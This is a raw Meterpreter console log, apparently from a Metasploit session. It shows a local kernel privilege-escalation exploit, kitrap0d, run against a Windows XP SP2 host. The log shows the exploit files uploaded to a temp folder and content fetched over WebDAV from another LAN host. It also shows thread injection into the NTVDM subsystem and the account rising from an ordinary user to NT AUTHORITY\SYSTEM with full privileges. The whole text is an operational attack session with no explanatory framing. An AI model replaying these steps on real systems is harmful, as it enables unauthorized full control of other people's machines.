meterpreter > getuid Server username: XPSP2\user meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeShutdownPrivilege SeChangeNotifyPrivilege SeUndockPrivilege meterpreter > sysinfo Computer: XPSP2 OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > run kitrap0d [*] Currently running as XPSP2\user [*] Loading the vdmallowed executable and DLL from the local system... [*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\fEiMXC.exe... [*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll... [*] Escalating our process (PID:1948)... [*] Received WebDAV PROPFIND request from 192.168.2.105:1372 [*] Sending 404 for /pXdaQozNq/cmd.exe ... '\\192.168.2.104\pXdaQozNq' CMD.EXE was started with the above path as the current directory. UNC paths are not supported. Defaulting to Windows directory. -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit -------------------------------------------- taviso@sdf.lonestar.org --- [?] GetVersionEx() => 5.1 [?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000 [?] Searching for kernel 5.1 signature: version 2... [+] Trying signature with index 3 [+] Signature found 0x2890a bytes from kernel base [+] Starting the NTVDM subsystem by launching MS-DOS executable [?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 300 [?] OpenProcess(300) => 0x7e8 [?] Injecting the exploit thread into NTVDM subsystem @0x7e8 [?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14); [?] WaitForSingleObject(0x7d4, INFINITE); [?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074 [+] The exploit thread reports exploitation was successful [+] w00t! You can now use the shell opened earlier [*] Deleting files... [*] Now running as NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeTcbPrivilege SeCreateTokenPrivilege SeAssignPrimaryTokenPrivilege SeLockMemoryPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege SeCreatePagefilePrivilege SeCreatePermanentPrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter >